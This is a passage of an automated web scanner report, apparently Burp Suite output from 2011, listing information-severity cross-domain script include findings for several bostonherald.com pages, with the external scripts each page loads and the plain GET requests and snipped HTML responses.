       <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...

18.652. http://www.bostonherald.com/mediacenter/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/mediacenter/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/lightbox.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cache.heraldinteractive.com/js/tooltips.js?fresh=973
http://edge.quantserve.com/quant.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /mediacenter/index.php HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:55:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 450914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>

                            <script src="http://cache.heraldinteractive.com/js/lightbox.js" type="text/javascript"></script>
                                <script src="http://cache.heraldinteractive.com/js/tooltips.js?fresh=973" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</body>

       <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...

18.653. http://www.bostonherald.com/mediacenter/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/mediacenter/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/lightbox.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cache.heraldinteractive.com/js/tooltips.js?fresh=283
http://edge.quantserve.com/quant.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

18.654. http://www.bostonherald.com/mediacenter/video.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The response dynamically includes the following script from another domain:

http://admin.brightcove.com/js/BrightcoveExperiences.js

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

18.655. http://www.bostonherald.com/mediacenter/video.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://objects.tremormedia.com/embed/js/_p.js
http://objects.tremormedia.com/embed/js/embed.js

Request

GET /mediacenter/video.php HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:58:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2341
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<div id="stage">

<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/embed.js"></script>
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/_p.js"></script>
...[SNIP]...

18.656. http://www.bostonherald.com/mediacenter/video.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://objects.tremormedia.com/embed/js/4c6ebfbed6269_p.js
http://objects.tremormedia.com/embed/js/embed.js

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

18.657. http://www.bostonherald.com/mobile/info.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/mobile/info.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://bh.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.4info.net/alert/ads/fastTrackAlerts.js
http://www.4info.net/js/auto_jump.js

Request

GET /mobile/info.bg HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:15:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 29845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>BostonHerald.com Mobile
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://bh.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...

<script type='text/javascript' src='http://www.4info.net/js/auto_jump.js'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.4info.net/alert/ads/fastTrackAlerts.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.4info.net/alert/ads/fastTrackAlerts.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.658. http://www.bostonherald.com/ne_snow/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/ne_snow/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/function_library.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /ne_snow/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:14:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 130027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://cache.heraldinteractive.com/js/function_library.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.659. http://www.bostonherald.com/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://q1digital.checkm8.com/adam/cm8adam_1_call.js

Request

GET /news/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:16:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 105318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.660. http://www.bostonherald.com/news/columnists/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/columnists/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /news/columnists/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:44:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 62757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.661. http://www.bostonherald.com/news/columnists/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/columnists/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

18.662. http://www.bostonherald.com/news/columnists/view/20110128speak_up_sal__or_itll_be_a_long_time_in_jail/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/columnists/view/20110128speak_up_sal__or_itll_be_a_long_time_in_jail/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/columnists/view/20110128speak_up_sal__or_itll_be_a_long_time_in_jail/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
